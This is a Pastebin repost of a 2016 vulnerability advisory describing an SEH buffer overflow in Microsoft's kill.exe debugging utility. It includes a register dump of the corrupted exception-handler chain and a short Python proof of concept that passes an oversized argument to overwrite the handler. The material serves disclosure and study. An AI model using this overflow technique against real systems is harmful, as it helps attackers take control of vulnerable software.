Advertisement
Lulz-Tigre

kill.exe

Jul 13th, 2016
208
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.37 KB | None | 0 0
  1. '''
  2. [+] Credits: HYP3RLINX
  3.  
  4.  
  5. Vendor:
  6. =================
  7. www.microsoft.com
  8.  
  9.  
  10. Product:
  11. =========================================
  12. Microsoft Process Kill Utility "kill.exe"
  13. File version: 6.3.9600.17298
  14.  
  15. The Kill tool (kill.exe), a tool used to terminate a process, part of the
  16. WinDbg program.
  17.  
  18.  
  19. Vulnerability Type:
  20. ===================
  21. Buffer Overflow
  22.  
  23.  
  24. SEH Buffer Overflow @ about 512 bytes
  25.  
  26.  
  27. Vulnerability Details:
  28. =====================
  29.  
  30. Register dump
  31.  
  32.  
  33. 'SEH chain of main thread
  34. Address    SE handler
  35. 001AF688   kernel32.756F489B
  36. 001AFBD8   52525252
  37. 42424242   *** CORRUPT ENTRY ***
  38.  
  39.  
  40. 001BF81C   41414141  AAAA
  41. 001BF820   41414141  AAAA
  42. 001BF824   41414141  AAAA
  43. 001BF828   41414141  AAAA
  44. 001BF82C   41414141  AAAA
  45. 001BF830   41414141  AAAA
  46. 001BF834   909006EB  ë  Pointer to next SEH record
  47. 001BF838   52525252  RRRR  SE handler  <================
  48. 001BF83C   90909090
  49. 001BF840   90909090
  50.  
  51.  
  52. Exploit code(s):
  53. ================
  54.  
  55. Python POC.
  56. '''
  57.  
  58. junk="A"*508+"RRRR"
  59.  
  60. pgm='c:\\Program Files (x86)\\Windows Kits\\8.1\\Debuggers\\x86\\kill.exe '
  61. subprocess.Popen([pgm, junk], shell=False)
  62.  
  63.  
  64. '''
  65. Disclosure Timeline:
  66. ==================================
  67. Vendor Notification: June 24, 2016
  68. Vendor reply:  Will not security service
  69. July 8, 2016  : Public Disclosure
  70.  
  71. #  0day.today [2016-07-13]  #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement